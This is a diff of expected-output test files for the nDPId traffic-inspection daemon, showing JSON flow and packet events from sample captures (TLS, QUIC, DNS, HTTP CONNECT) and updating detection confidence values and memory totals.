{"query":"apache.org","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"151.101.2.132"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1631454722867,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1631454722867,"pkt":"ACWQX+cTAAwpTU5kCABFAAA8Fy1AAEAGx2vAqAGSl2UChIyAAbsTD57aAAAAAKAC+vBcUgAAAgQFtAQCCAoKBFeEAAAAAAEDAwc="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1631454722876,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1631454722876,"pkt":"AAwpTU5kACWQX+cTCABFAAA8AABAADwG4piXZQKEwKgBkgG7jICt6jOtEw+e26AS\/\/+T8gAAAgQFdAQCCAosPaiUCgRXhAEDAwk="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1631454722876,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631454722876,"pkt":"ACWQX+cTAAwpTU5kCABFAAA0Fy5AAEAGx3LAqAGSl2UChIyAAbsTD57breozroAQAfZcSgAAAQEICgoEV40sPaiU"} -00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1631454722867,"flow_last_seen":1631454722879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1631454722879,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apache.org","ja3":"c834494f5948ae026d160656c93c8871","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1631454722867,"flow_last_seen":1631454722895,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1384,"flow_tot_l4_payload_len":1901,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1631454722895,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"apache.org","ja3":"c834494f5948ae026d160656c93c8871","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1631454722977,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"192.168.1.2","src_port":47767,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1631454722867,"flow_last_seen":1631454722977,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1384,"flow_tot_l4_payload_len":32652,"flow_avg_l4_payload_len":562,"midstream":0,"thread_ts_msec":1631454722977,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1631454722864,"flow_last_seen":1631454722977,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5536,"flow_tot_l4_payload_len":24627,"flow_avg_l4_payload_len":615,"midstream":0,"thread_ts_msec":1631454722977,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.146","src_port":1714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP_Connect","breed":"Acceptable","category":"Web"}} +00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1631454722867,"flow_last_seen":1631454722879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1631454722879,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apache.org","ja3":"c834494f5948ae026d160656c93c8871","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1631454722867,"flow_last_seen":1631454722895,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1384,"flow_tot_l4_payload_len":1901,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1631454722895,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"apache.org","ja3":"c834494f5948ae026d160656c93c8871","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1631454722977,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"192.168.1.2","src_port":47767,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1631454722867,"flow_last_seen":1631454722977,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1384,"flow_tot_l4_payload_len":32652,"flow_avg_l4_payload_len":562,"midstream":0,"thread_ts_msec":1631454722977,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"151.101.2.132","src_port":35968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1631454722864,"flow_last_seen":1631454722977,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5536,"flow_tot_l4_payload_len":24627,"flow_avg_l4_payload_len":615,"midstream":0,"thread_ts_msec":1631454722977,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.146","src_port":1714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP_Connect","breed":"Acceptable","category":"Web"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":100,"source":"http_connect.pcap","alias":"nDPId-test","packets-captured":100,"packets-processed":100,"total-skipped-flows":0,"total-l4-payload-len":57373,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":22,"global_ts_msec":1631454722977} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 100/100 @@ -28,9 +28,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5876658 bytes -~~ total memory freed........: 5876658 bytes -~~ total allocations/frees...: 118228/118228 +~~ total memory allocated....: 6010292 bytes +~~ total memory freed........: 6010292 bytes +~~ total allocations/frees...: 120990/120990 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 924 chars diff --git a/test/results/http_ipv6.pcap.out b/test/results/http_ipv6.pcap.out index c02451e52..58d48d91d 100644 --- a/test/results/http_ipv6.pcap.out +++ b/test/results/http_ipv6.pcap.out @@ -5,11 +5,11 @@ 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1448269123971,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269123971,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBABggEAAAAAAAAIA4qAA1AAAEAA3qswP\/+pw1MAbueThTRAVNLJelYgBABCVvaAAABAQgKD8WrNBINPNs="} 00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127395,"flow_last_seen":1448269127395,"flow_idle_time":7580000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1448269127395,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":41776,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00746{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1448269127395,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":268,"pkt_l4_len":214,"thread_ts_msec":1448269127395,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAANYGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAXozABuw3EcnAKcmsggBgBYRYsAAABAQgKEg1sPOPdU5wXAwMAsUohbF6hqm2iPbr5acUercfvDKKXo6eRxQREALqHMULPkKcrij9I+s937a+Ptj\/48lLHQ1Wb3SgwI5IkBSOhrv6IVrq\/yOhvf7XOjabBqvbdcaHqf1DGDHgPPOpYr+dJO5wcSH25xkyZHXLU0QNqpczDg7dKCMPOVcOltspkl5ZzoyNyh0jvlmeYCBWg6kXBip25FBniFP0s4NZksUmy3aWhoSbUDQ+LvhRDb4xtwZyJTw=="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127395,"flow_last_seen":1448269127395,"flow_idle_time":7580000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1448269127395,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":41776,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127395,"flow_last_seen":1448269127395,"flow_idle_time":7580000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1448269127395,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":41776,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1448269127395,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":124,"pkt_l4_len":70,"thread_ts_msec":1448269127395,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAAEYGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAXozABuw3EcyYKcmsggBgBYRWcAAABAQgKEg1sPOPdU5wXAwMAISEEhc9+XaFrGjMSta2tz\/npJ9wouC3HutuqGdJZFlD+8g=="} 00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127400,"flow_last_seen":1448269127400,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1448269127400,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":45931,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02275{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1448269127400,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1412,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1412,"pkt_l4_len":1358,"thread_ts_msec":1448269127400,"pkt":"UMWNrEEBeKzApw1Mht1gAAAABU4RQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAXs2sBuwVOGq8NSb7i0\/DtzNZRMDI1AdhpfiGrZQ0z8Xo88wCgAQAEQ0hMTxcAAABQQUQAlQEAAFNOSQCiAQAAU1RLANwBAABWRVIA4AEAAENDUwDoAQAATk9OQwgCAABNU1BDDAIAAEFFQUQQAgAAVUFJRDACAABTQ0lEQAIAAFRDSUREAgAAUERNREgCAABTUkJGTAIAAElDU0xQAgAAUFVCU3ACAABTQ0xTdAIAAEtFWFN4AgAAQ09QVHgCAABDQ1JUkAIAAElSVFSUAgAAQ0VUVjgDAABDRkNXPAMAAFNGQ1dAAwAALS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0td3d3Lmdvb2dsZS5pdP6VATCysYcS+6UyHFs91qYSgNdeDzmk0IEyIe5t2+bJKAI2qamMt0i7KMYplR0K0jnCGwmAm\/d3HOJRMDI1eybp5+Rccf9WUtVHu\/cGtxBbc83x\/ixhHuZYGb85GDRSl0WTDzqXHGQAAABDQzEyQ2hyb21lLzQ2LjAuMjQ5MC44MCBMaW51eCB4ODZfNjRJY0N+fBRzPpi9ZOX2cffRAAAAAFg1MDkAABAAHgAAAKnIKfkyK+SzUnB6164ARpx8JYjcWyR0opR8VfpSZa5LAQAAAEMyNTWqEkFTJwbowuJjGoJ9cYVfQAt7kKmueesKxAMAMPg3G85FTSE++LOaAtQpI1KVeq729JfhjhoCsaupNHH2PFh7nIyQFBUHu\/yG69qYF+ZOXnLeZQlagMSAtKsuormBERnE1N5BArSjLGqyjEsI7xMsjf+GWiD9zqRxEMc6cBgFvzaEvMvxi2SGPZg7npVciNOVP9ZU7k0lklFQEmkIVXhAz857PhdAM9F8uaoJzSnjSvvppgNKNbAOmmtmPDeC+pIAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127400,"flow_last_seen":1448269127400,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1448269127400,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":45931,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.it","user_agent":"Chrome\/46.0.2490.80 Linux x86_64"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269127400,"flow_last_seen":1448269127400,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1448269127400,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":45931,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.it","user_agent":"Chrome\/46.0.2490.80 Linux x86_64"}} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1448269127419,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269127419,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBAAQgDAAAAAAAAEBcqAA1AAAEAA3qswP\/+pw1MAbujMApyayANxHMmgBABMJ3AAAABAQgK493E7RINbDw="} 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1448269127425,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1412,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1412,"pkt_l4_len":1358,"thread_ts_msec":1448269127425,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAABU4ROCoAFFBAAQgDAAAAAAAAEBcqAA1AAAEAA3qswP\/+pw1MAbuzawVOyY8AAb8WJ6Bcd8sMmCgT1ZAbf9HJtJU65m4+bYpFMYi142VYaY8+t63\/dljK20Pk6Hvm9ZGbc4Et8i29+QvT1kI6MUSu9s3cUHjnw2xTVTxhsAZQm3P8lhXGD3mDtRkg1sEr5Q7cUyyDCLFUAAa6oJdZ2+wjH2gcLInCstN8U\/9bx6mOB4zttEHtP4c5+\/9wVsqFhWr8fRfl3NhWM5wR+Zg8+H9Dwriy2djsTqMxZ15btYw8HWKV3SpS+cchPqkycwN+jDrgd3LuUYlETydIegf69eD\/JtLcKLFbEN5\/5QkOg9oAmwqqCClTPJLTkbez9M4pFkrM2VJDxnT19PvnGpVdwH0wIvKNgr8RVKNTlGILXC+9jJMPkA9tVfHgEWzHqgG+WxljhwAd4QSufx6LSzCoBsf86nBeKfgcGq9lFFZLToMS1VjjSASPtZOvlSLyuxjHryC2XTxpVHUN\/PBKPgXBScR4DFFlJHRdFSNH3eaciyVInAjiCfV6HJYS+DuTQgUqjcyAG5tuDXYslL4LNyVesK76J8Q9FVPv6Ab4vTklEVJejFK80Cn8IouJ9WHz8uTM24UHbOmpAA\/c+EPPNLCB9F8iGG66BwJvUEBHZ3Ygj9rnWqSJgSU55vdrYi5luNP1KoXM4YmziEg8e+xJprdp11YpNV+0lAxdI0zR9s3KRF+wKmv6XtU8gBoCwTHodAHf32dQGfVior2u\/KHctDxD8nHTXU0AZV0DGAOL04YVg9K9w3y4THfVYJpIoP+uyoruQl0rsX9ENsZ5qS+dOXnu5LcoS2EGP16jbi7uY9ogtSWghhTOmmCzmJAGprVn6JTMBLO193Vra3mqDuGuMUOZM\/l8mB81H2MusGIWIde9dns9dj2AG\/cfGaDWSays\/fK3VtGGTBv7FaSH\/aw\/Q2zkhNIJX\/WFH6YUEleLUh25ypFwius1sBxwKIcgK2ijlBJ8pqokusSGJDg\/c4+DqzUrA93\/HrO5AiXdFCeRaHb7qWTzL0p26M50TOgV5ZhM261i0CZOTvKrCn9iZeIH3z5r82ZP101c8INU8PByLFZYWSBQLEx1DNpqjwLojRfhTpMW5JdNN\/sTmhr77P3fBJRr6WfjS8BevHVq9cSi8laxJh0JQkiYq6WSdgUPITf15zal35ZU99gHjN8lHKLEe4ulo25UZrSeatzSMZUm5A91iw1tGWfGpH4DfLZt8Ntly9VWHd\/87hCB87\/piwS6u4+4ryQp4GDxllbW\/SkuP\/IAA9Zuq742fzBVuJkS4BpNCthxU0Qle\/rg\/gQjlJJVbj2FDnbMgmtbocxxIFkNS+NNJJEtuvLnbQCDuw8uZDIIX7G8SvS+F8HVI+jLOPdR15E6Pnf84ervCPA5o0JfpJr+Ni3PIRv3FKi+p5DZaL1kmCkPEBtHdwkl3y2psiuigxSpcsFcwghyrpx9hiMFpPOeQbZd1kDbqrcKz3DwJXNrOM5TljZcc+q\/sTNd3axpOt7TtQGaRTUzdKfgFeiq5EoRUpye4hhSuSwq98WPbz5OcLGEG00xOPY3pwtztgP3Hft4qU9pxAWCD6O+UUk1tCU0r2xCd25EV4iBdLikeLpIHEfcmHIJd72ETZjpLfti3i9QaSkD\/AsqiENwvRS6H7x34vPid3KkvLGz\/SjeWjBz44e2RAwUEkK\/6QdG765SHEZEytfd\/\/s1VN9Lrlmg\/JhogP6qMLZp6e145R0qbs7qAEZeb\/fZQhZM2cMG0S3vs2+Qg8KLzxAegZ7RC0gS+QzKcRpj6NRz\/TYo6NL+7\/Uv2rcnFhb6N0M="} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1448269127426,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":99,"pkt_l4_len":45,"thread_ts_msec":1448269127426,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAAC0RQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAXs2sBuwAtFY4MSb7i0\/DtzNYC4PYSufRYk3sdRNPxvPTHCMs5+9cyKuKyC\/5g"} @@ -28,19 +28,19 @@ 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1448269138600,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269138600,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkm4Bu5jVbXMqpl5tgBAA4WsSAAABAQgKEg13LQBerOc="} 